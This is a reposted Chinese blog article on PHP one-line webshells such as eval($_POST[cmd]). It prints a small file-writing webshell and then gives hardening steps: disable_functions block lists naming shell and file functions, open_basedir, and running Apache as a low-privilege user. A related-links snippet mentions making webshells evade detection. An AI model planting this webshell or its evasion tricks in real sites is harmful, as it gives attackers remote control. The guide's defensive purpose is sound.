php中的eval,[转载]?php eval($_POST[cmd]);?一句话木马解读
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。
php网页木马
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[$k] =stripslashes($v);
?>
保存文件名: ">
if(isset($_POST['file']))
{
$fp= @fopen($_POST['file'],'wb');
echo@fwrite($fp,$_POST['text']) ?'保存成功!':'保存失败!';
@fclose($fp);
}
?>
一句话php木马
PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext
Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode, 在,php.ini中设置 disable_functions=
passthru,exec,shell_exec,system
二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行:
php_admin_value open_basedir /usr/local/apache/htdocs
,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误:
Warning: open_basedir restriction in effect. File is in wrong
directory in /usr/local/apache/htdocs/open.php on line 4
等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system
后面加上php处理文件的函数,主要有
fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile
。即成为 disable_functions=
passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir
,fopen,fread,fclose,fwrite,file_exists
,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile
。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。
如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft
/add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this
account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。
下面是mcafee的安全设置,防止一些网页木马生成文件等。
http://www.jb51.net/hack/list461_1.html
php中的eval,[转载]?php eval($_POST[cmd]);?一句话木马解读相关推荐
- php post cmd,[转载]?php eval($_POST[cmd]);?一句话木马解读
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件.并在php.ini中设置一下. php网页木马 header( ...
- php eval一句话木马干啥的,?php eval($_POST[cmd]);?一句话木马解读
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件.并在php.ini中设置一下. php网页木马 header( ...
- shell 免杀aspx_避开eval关键字,打造免杀一句话木马
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量. ...
- 一句话木马@eval($_POST[“cmd“]);是什么意思(超详细)
在文件上传(upload)类ctf题中,相信大家都接触过一句话木马 <?php @eval($_POST["cmd"]); ?> 那么具体它是扫描意思呢 POST 是h ...
- php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...
前言 在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...
- 浅入浅出JS中的eval及json
声明: 首先声明一下,本人是JS新手,所以不敢说深入,只是把最近对eval的学习经验拿出来跟大家分享,如果您是高手可略去不看. 适合读者: 对JS中的eval一知半解,不知eval是如何把字符串转换为 ...
- Python中的eval()、exec()及其相关函数
刚好前些天有人提到eval()与exec()这两个函数,所以就翻了下Python的文档.这里就来简单说一下这两个函数以及与它们相关的几个函数,如globals().locals()和compile() ...
- [转]Python中的eval()、exec()及其相关函数
Python中的eval().exec()及其相关函数 刚好前些天有人提到eval()与exec()这两个函数,所以就翻了下Python的文档.这里就来简单说一下这两个函数以及与它们相关的几个函数,如 ...
- PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
一句话木马如下,利用文件上传漏洞,往目标网站上传该木马,即可获取和控制整个网站主机目录 <?php @eval($_POST['hack']); ?> 语句解析 @符号 @符号表示后面的语 ...
- asp.net中databinder.eval用法的总结
asp.net中databinder.eval用法的总结 <%# bind("subject") %> //绑定字段 <%# container.dataitem ...
最新文章
- <软件过程与改进>计算大题考点总结与例题
- linux启动x不启动桌面,redhat开机不启动桌面登录程序
- 一作解读:EID-2017-宏基因组测序在新发腹泻病毒鉴定中的应用
- 淘淘商城学习笔记 之 上传图片到远程服务器,图片的回显出现的bug
- xampp php连接mysql数据库_关于PHP xampp连接数据库之后查询失败,数据库连接成功,表中也有数据...
- 信息学奥赛一本通 2040:【例5.7】筛选法找质数 (普通筛 线性筛)
- Gprinter Android SDK V2.1.4 使用说明
- 微观经济学 —— 公用品悲剧(tragedy of commons)
- 剑指offer——数组中重复的数字
- qq空间显示手机型号android,qq说说显示手机型号 qq说说显示手机型号在哪里设置...
- JDK源码——源码学习总结与分析
- python os模块安装方法_Python模块——os模块详解
- java获取法定节假日
- 洛谷P4234 最小差值生成树 题解
- 多目标进化优化-SPEA/R
- JavaEE-01-温故(集合、泛型、io、多线程)知新(junit、内省、路径问题)
- 机械师f117-7p安装linux禁用触摸板问题
- 考研数学 第6讲 中值定理
- SK Innovation全球锂电战略布局揭秘
- C语言之指针知识大总结